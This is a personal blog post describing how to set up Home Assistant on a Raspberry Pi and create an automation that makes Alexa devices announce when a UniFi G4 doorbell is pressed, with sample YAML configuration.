    Home Assistant can quickly become a hobby that overwhelms you. Every object (entity) in your house that is even remotely connected can become programmable. Everything. Even people! You can declare that any name:value pair that (for example) your phone can expose can be consumable by Home Assistant. Questions like “is Scott home” or “what’s Scott’s phone battery” can be associated with Scott the Entity in the Home Assistant Dashboard.

    I was amazed at the devices/objects that Home Assistant discovered that it could automate. Lights, remotes, Spotify, and more. You’ll find that any internally connected device you have likely has an Integration available.

    Temperature, Light Status, sure, that’s easy Home Automation. But integrations and 3rd party code can give you details like “Is the Living Room dark” or “is there motion in the driveway.” From these building blocks, you can then build your own IFTTT (If This Then That) automations, combining not just two systems, but any and all disparate systems.

    What’s the best part? This all runs LOCALLY. Not in a cloud or the cloud or anyone’s cloud. I’ve got my stuff running on a Raspberry Pi 4. Even better I put a Power Over Ethernet (PoE) hat on my Rpi so I have just one network wire into my hub that powers the Pi.

    I believe setting up Home Assistant on a Pi is the best and easiest way to get started. That said, you can also run in a Docker Container, on a Synology or other NAS, or just on Windows or Mac in the background. It’s up to you. Optionally, you can pay Nabu Casa $5 for remote (outside your house) network access via transparent forwarding. But to be clear, it all still runs inside your house and not in the cloud.

    Basic Home Assistant Setup

    OK, to the main point. I used to have an Amazon Ring Doorbell that would integrate with Amazon Alexa and when you pressed the doorbell it would say “Someone is at the front door” on our all Alexas. It was a lovely little integration that worked nicely in our lives.

    Front Door UniFi G4 Doorbell

    However, I swapped out the Ring for a Unifi Protect G4 Doorbell for a number of reasons. I don’t want to pump video to outside services, so this doorbell integrates nicely with my existing Unifi installation and records video to a local hard drive. However, I lose any Alexa integration and this nice little “someone is at the door” announcement. So this seems like a perfect job for Home Assistant.

    Here’s the general todo list:

    • Install Home Assistant
    • Install Home Assistant Community Store
      • This enables 3rd party “untrusted” integrations directly from GitHub. You’ll need a GitHub account and it’ll clone custom integrations directly into your local HA.
      • I also recommend the Terminal & SSH (9.2.2), File editor (5.3.3) add ons so you can see what’s happening.
    • Get the UniFi Protect 3rd party integration for Home Assistant
      • NOTE: Unifi Protect support is being promoted in Home Assistant v2022.2 so you won’t need this step soon as it’ll be included.
      • “The UniFi Protect Integration adds support for retrieving Camera feeds and Sensor data from a UniFi Protect installation on either an Ubiquiti CloudKey+, Ubiquiti UniFi Dream Machine Pro or UniFi Protect Network Video Recorder.”
      • Authenticate and configure this integration.
    • Get the Alexa Media Player integration
      • This makes all your Alexas show up in Home Assistant as “media players” and also allows you to tts (text to speech) to them.
      • Authenticate and configure this integration.

    I recommend going into your Alexa app and making a Multi-room Speaker Group called “everywhere.” Not only because it’s nice to be able to say “play the music everywhere” but you can also target that “Everywhere” group in Home Assistant.

    Go into your Home Assistant UI at http://homeassistant.local:8123/ and into Developer Tools. Under Services, try pasting in this YAML and clicking “call service.”

    service: notify.alexa_media_everywhere
    data:
      message: Someone is at the front door, this is a test
      data:
        type: announce
        method: speak

    If that works, you know you can automate Alexa and make it say things. Now, go to Configuration, Automation, and Add a new Automation. Here’s mine. I used the UI to create it. Note that your Entity names may be different if you give your front doorbell camera a different name.

    Binary_sensor.front_door_doorbell

    Notice the format of Data, it’s name value pairs within a single field’s value.

    Alexa Action

    …but it also exists in a file called Automations.yaml. Note that the “to: ‘on’” trigger is required or you’ll get double announcements, one for each state change in the doorbell.

    - id: '1640995128073'
      alias: G4 Doorbell Announcement with Alexa
      description: G4 Doorbell Announcement with Alexa
      trigger:
      - platform: state
        entity_id: binary_sensor.front_door_doorbell
        to: 'on'
      condition: []
      action:
      - service: notify.alexa_media_everywhere
        data:
          data:
            type: announce
            method: speak
          message: Someone is at the front door
      mode: single

    It works! There’s a ton of cool stuff I can automate now!


    Sponsor: Make login Auth0’s problem. Not yours. Provide the convenient login features your customers want, like social login, multi-factor authentication, single sign-on, passwordless, and more. Get started for free.




    About Scott

    Scott Hanselman is a former professor, former Chief Architect in finance, now speaker, consultant, father, diabetic, and Microsoft employee. He is a failed stand-up comic, a cornrower, and a book author.

    facebook
    bluesky
    subscribe
    About   Newsletter

    Hosting By
    Hosted on Linux using .NET in an Azure App Service










    Source link